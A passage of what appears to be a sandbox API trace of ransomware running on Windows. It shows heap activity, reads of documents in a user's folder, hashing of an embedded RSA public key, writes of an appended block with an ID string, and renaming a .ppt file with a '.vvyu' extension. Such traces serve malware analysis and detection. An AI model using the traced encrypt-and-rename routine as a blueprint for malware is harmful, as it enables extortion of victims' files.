RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b20 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea5740 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea5950 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea5b68 [0193.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5950 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5b68 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95968 | out: hHeap=0x620000) returned 1 [0193.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5740 | out: hHeap=0x620000) returned 1 [0193.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.516] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0a68*, nNumberOfBytesToWrite=0x4ccd, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea0a68*, lpNumberOfBytesWritten=0x312fb14*=0x4ccd, lpOverlapped=0x0) returned 1 [0193.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.517] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4cd2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.517] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.518] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.518] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.518] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.518] CloseHandle (hObject=0x568) returned 1 [0193.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.520] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\cqA0H3g9.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\cqa0h3g9.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\cqA0H3g9.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\cqa0h3g9.ppt.vvyu")) returned 1 [0193.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.521] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.524] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0edcca0, ftCreationTime.dwHighDateTime=0x1d869d3, ftLastAccessTime.dwLowDateTime=0xb8fd3f00, ftLastAccessTime.dwHighDateTime=0x1d89acc, ftLastWriteTime.dwLowDateTime=0xb8fd3f00, ftLastWriteTime.dwHighDateTime=0x1d89acc, nFileSizeHigh=0x0, nFileSizeLow=0x5194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CzDS-.pptx", cAlternateFileName="CZDS-~1.PPT")) returned 1 [0193.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95968 [0193.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0193.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95968 | out: hHeap=0x620000) returned 1 [0193.525] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\CzDS-.pptx") returned=".pptx" [0193.525] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\CzDS-.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\czds-.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.527] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=20884) returned 1 [0193.528] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.532] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x516e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.532] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.536] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.536] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x5194, lpOverlapped=0x0) returned 1 [0193.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.537] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.537] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.538] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.538] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.539] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.539] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.539] GetLastError () returned 0x0 [0193.539] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.539] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.539] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.540] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.540] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5190) returned 0x2ea0a68 [0193.540] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95968 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959b0 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93888 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.541] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea5c00 [0193.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5c00 | out: hHeap=0x620000) returned 1 [0193.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93828 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.545] GetCurrentThreadId () returned 0x66c [0193.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f260 [0193.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.546] GetCurrentThreadId () returned 0x66c [0193.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 